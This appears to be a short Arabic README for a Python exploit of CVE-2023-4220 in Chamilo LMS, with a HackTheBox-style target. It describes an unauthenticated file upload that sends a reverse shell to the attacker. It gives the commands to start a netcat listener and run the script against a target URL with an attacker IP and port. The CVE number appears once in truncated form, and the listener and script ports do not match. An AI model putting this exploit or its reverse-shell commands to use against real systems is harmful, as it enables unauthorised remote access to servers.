
استغلال Python للثغرة CVE-2023-4220 في Chamilo LMS يقوم برفع ملف وتوصيل reverse shell غير مُصادَق عليه إلى مستمع netcat.
pip install requests
يستخدم سكربت Python الثغرة الأمنية CVE-2023-422 لرفع ملف إلى الخادم ويستخدم ذلك الملف لإرسال reverse shell إلى مستمع netcat، وكل هذا يمكن القيام به دون المصادقة. ومع ذلك، ستحتاج إلى اتباع الخطوات التالية لاستخدام سكربت Python بنجاح.
بدء مستمع netcat:
nc -lnvp 4444
تنفيذ سكربت Python (مثال):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
يرجى ترك نجمة إذا كان الاستغلال التالي مفيدًا :)